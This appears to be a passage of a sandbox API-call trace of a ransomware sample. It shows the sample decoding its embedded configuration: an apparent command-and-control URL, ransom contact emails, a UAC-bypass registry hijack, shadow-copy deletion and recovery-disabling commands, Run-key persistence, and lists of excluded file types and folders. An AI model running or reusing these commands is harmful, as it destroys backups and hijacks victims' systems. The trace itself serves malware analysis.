lpWideCharStr=0x14cde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.803] FreeResource (hResData=0x50d64c) returned 0 [0093.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d4f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x148cd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0093.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x148cd18, cbMultiByte=239, lpWideCharStr=0x1492e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.803] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x148399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0093.803] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x148399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0093.803] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0093.805] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0093.806] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0093.807] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0093.807] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0093.808] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0093.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0093.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0093.810] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0093.811] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x146c63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0093.811] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x146c63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0093.811] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x146c63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0093.811] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x146c63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0093.811] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0093.811] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0093.812] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0093.812] LockResource (hResData=0x50d72c) returned 0x50d72c [0093.812] FreeResource (hResData=0x50d72c) returned 0 [0093.812] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.812] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.812] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.812] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5008, cbMultiByte=38, lpWideCharStr=0x14cdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.812] FreeResource (hResData=0x50d64c) returned 0 [0093.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.812] GetCurrentThreadId () returned 0xae8 [0093.812] GetCurrentThreadId () returned 0xae8 [0093.812] GetCurrentThreadId () returned 0xae8 [0093.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x146e688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0093.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x146e688, cbMultiByte=1410, lpWideCharStr=0x1489afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0093.813] GetCurrentThreadId () returned 0xae8 [0093.813] GetCurrentThreadId () returned 0xae8 [0093.813] GetCurrentThreadId () returned 0xae8 [0093.813] GetCurrentThread () returned 0xfffffffe [0093.813] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0093.813] GetLastError () returned 0x3f0 [0093.813] GetCurrentProcess () returned 0xffffffff [0093.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0093.813] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x1487ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x1487ae0, ReturnLength=0x12fc60) returned 1 [0093.813] CloseHandle (hObject=0xb8) returned 1 [0093.813] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x276438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0093.813] EqualSid (pSid1=0x276438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1487b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0093.813] EqualSid (pSid1=0x276438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1487b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0093.813] EqualSid (pSid1=0x276438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1487b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0093.813] GetCurrentProcess () returned 0xffffffff [0093.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0093.813] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0093.813] GetLastError () returned 0x7a [0093.813] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2776d8 [0093.813] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2776d8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2776d8, ReturnLength=0x12fc64) returned 1 [0093.813] GetSidSubAuthorityCount (pSid=0x2776e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2776e1 [0093.813] GetSidSubAuthority (pSid=0x2776e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2776e8 [0093.813] LocalFree (hMem=0x2776d8) returned 0x0 [0093.813] CloseHandle (hObject=0xb8) returned 1 [0093.813] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0093.813] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0093.813] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.815] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0093.815] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0093.815] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0093.815] LockResource (hResData=0x516824) returned 0x516824 [0093.816] FreeResource (hResData=0x516824) returned 0 [0093.816] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.816] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.816] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.816] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5008, cbMultiByte=38, lpWideCharStr=0x14cdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.816] FreeResource (hResData=0x50d64c) returned 0 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.816] GetCurrentThreadId () returned 0xae8 [0093.816] GetCurrentThreadId () returned 0xae8 [0093.816] GetCurrentThreadId () returned 0xae8 [0093.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1460128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0093.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1460128, cbMultiByte=615, lpWideCharStr=0x146c65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] 